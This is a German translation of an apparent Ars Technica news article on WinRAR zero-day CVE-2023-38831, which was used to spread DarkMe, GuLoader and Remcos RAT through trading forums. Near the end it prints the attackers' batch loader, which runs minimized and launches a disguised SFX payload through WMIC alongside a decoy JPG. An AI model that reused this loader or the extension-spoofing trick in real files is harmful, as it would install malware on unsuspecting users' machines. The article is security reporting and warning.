WinRAR 0-Day, das vergiftete JPG- und TXT-Dateien verwendet, die seit April ausgenutzt werden – Ars Technica

Ein neu entdeckter Zero-Day im weit verbreiteten Dateikomprimierungsprogramm WinRAR wird seit vier Monaten von unbekannten Angreifern ausgenutzt, um Malware zu installieren, wenn es um das Öffnen von mit Sprengfallen versehenen JPGs und anderen harmlosen Dateiarchiven geht.

Die Sicherheitslücke, die in der Art und Weise liegt, wie WinRAR das ZIP-Dateiformat verarbeitet, wird seit April in Wertpapierhandelsforen aktiv ausgenutzt, berichteten Forscher des Sicherheitsunternehmens Group IB am Mittwoch. Die Angreifer nutzten die Sicherheitslücke, um aus der Ferne Code auszuführen, der Malware aus Familien wie DarkMe, GuLoader und Remcos RAT installiert.

Von dort heben die Kriminellen Geld von Brokerkonten ab. Der Gesamtbetrag der finanziellen Verluste und die Gesamtzahl der infizierten Opfer sind unbekannt, obwohl Group-IB sagte, sie habe mindestens 130 Personen aufgespürt, von denen bekannt ist, dass sie kompromittiert wurden. WinRAR-Entwickler haben die Schwachstelle mit der Bezeichnung CVE-2023-38831 Anfang des Monats behoben.

ZIP-Archive als Waffe einsetzen

„Durch die Ausnutzung einer Schwachstelle in diesem Programm konnten Bedrohungsakteure ZIP-Archive erstellen, die als Träger für verschiedene Malware-Familien dienen“, schrieb Andrey Polovinkin, Malware-Analyst bei Group-IB. „Waffenfähige ZIP-Archive wurden in Handelsforen verteilt. Sobald die Malware extrahiert und ausgeführt wurde, können Bedrohungsakteure Geld von Brokerkonten abheben. Diese Schwachstelle wird seit April 2023 ausgenutzt.“

Obwohl Group-IB die Schwachstelle nicht entdeckt hat, die in anderen Umgebungen ausgenutzt wird oder andere Malware-Familien installiert, wäre es nicht überraschend, wenn dies der Fall wäre. Im Jahr 2019 wurde eine ähnliche WinRAR-Schwachstelle mit der Bezeichnung CVE-2018-20250 bereits wenige Wochen nach Bekanntwerden aktiv angegriffen. Es wurde in nicht weniger als fünf verschiedenen Kampagnen von verschiedenen Bedrohungsakteuren eingesetzt.

WinRAR hat mehr als 500 Millionen Benutzer, die sich darauf verlassen, dass das Programm große Dateien komprimiert, um sie einfacher zu verwalten und schneller hoch- und herunterzuladen. Es ist nicht ungewöhnlich, dass Benutzer die resultierenden ZIP-Dateien sofort dekomprimieren, ohne sie vorher zu überprüfen. Selbst wenn jemand versucht, sie auf böswillige Absichten zu untersuchen, hat Antivirensoftware oft Schwierigkeiten, in die komprimierten Daten einzudringen, um bösartigen Code zu identifizieren.

Die von Group-IB gefundenen schädlichen ZIP-Archive wurden in öffentlichen Foren veröffentlicht, die von Händlern genutzt werden, um Informationen auszutauschen und Themen im Zusammenhang mit Kryptowährungen und anderen Wertpapieren zu diskutieren. In den meisten Fällen wurden die bösartigen ZIPs an Forenbeiträge angehängt. In anderen Fällen wurden sie über die Catbox der Dateispeicher-Site verteilt[.]moe. Group-IB identifizierte acht beliebte Handelsforen, die zur Verbreitung der Dateien genutzt wurden.

In einem Fall warnten Administratoren eines der missbrauchten Foren Benutzer, nachdem sie entdeckt hatten, dass schädliche Dateien auf der Plattform verbreitet wurden.

„Trotz dieser Warnung wurden weitere Beiträge verfasst und mehr Benutzer waren betroffen“, schrieb Polovinkin. „Unsere Forscher sahen auch Hinweise darauf, dass die Bedrohungsakteure in der Lage waren, Konten zu entsperren, die von Forumadministratoren deaktiviert wurden, um weiterhin schädliche Dateien zu verbreiten, sei es durch Beiträge in Threads oder durch das Versenden privater Nachrichten.“ Die folgenden Bilder zeigen einige der Beiträge, mit denen Menschen angelockt wurden dazu veranlasst, sie herunterzuladen, und eine Warnung eines Administrators eines der missbrauchten Foren.

Ein Forumsteilnehmer berichtete, dass sich die Angreifer unbefugt Zugriff auf ein Brokerkonto verschafft hätten. Ein Abhebungsversuch scheiterte aus unklaren Gründen.

Komplizierte Infektionskette

Der Exploit der Angreifer löste eine komplizierte Infektionskette aus, die unten dargestellt ist:

Polovinkin schrieb:

Die Cyberkriminellen nutzen eine Schwachstelle aus, die es ihnen ermöglicht, Dateierweiterungen zu fälschen, was bedeutet, dass sie den Start von Schadcode in einem Archiv verbergen können, das als „.jpg“, „.txt“ oder ein anderes Dateiformat getarnt ist. Sie erstellen ein ZIP-Archiv, das sowohl schädliche als auch nicht schädliche Dateien enthält. Wenn das Opfer ein speziell gestaltetes Archiv öffnet, sieht das Opfer normalerweise eine Bilddatei und einen Ordner mit demselben Namen wie die Bilddatei.

Wenn das Opfer auf die Täuschungsdatei klickt, die als Bild getarnt sein kann, wird ein Skript ausgeführt, das die nächste Stufe des Angriffs startet. Dieser Vorgang ist in Abbildung 10 (unten) dargestellt.

Bei unserer Untersuchung ist uns aufgefallen, dass das ZIP-Archiv eine veränderte Dateistruktur aufweist. Im Archiv befinden sich zwei Dateien: ein Bild und ein Skript. Anstatt das Bild zu öffnen, wird das Skript gestartet. Der Hauptzweck des Skripts besteht darin, die nächste Stufe des Angriffs einzuleiten. Dies geschieht, indem ein minimiertes Fenster von sich selbst ausgeführt wird. Anschließend wird nach zwei spezifischen Dateien gesucht, nämlich „Screenshot_05-04-2023.jpg“ und „Images.ico“. Bei der JPG-Datei handelt es sich um ein Bild, das das Opfer zunächst geöffnet hat. „Images.ico“ ist ein SFX-CAB-Archiv zum Extrahieren und Starten neuer Dateien. Nachfolgend finden Sie ein Beispiel für das Skript:

@echo off
if not DEFINED IS_MINIMIZED
set IS_MINIMIZED=1 && start "" /min "%~dpnx0" %* && exit
cd %TEMP%
for /F "delims=" %%K in ('dir /b /s "Screenshot_05-04-2023.jpg"') do
for /F "delims=" %%G in ('dir /b /s "Images.ico"') do
WMIC process call create "%%~G" && "%%~K" && cd %CD% && exit
exit

Da die Sicherheitslücke nun weithin bekannt ist, wird sie wahrscheinlich in großem Umfang ausgenutzt. Wer WinRAR nutzt, sollte vor der erneuten Nutzung des Programms auf Version 6.23 aktualisieren.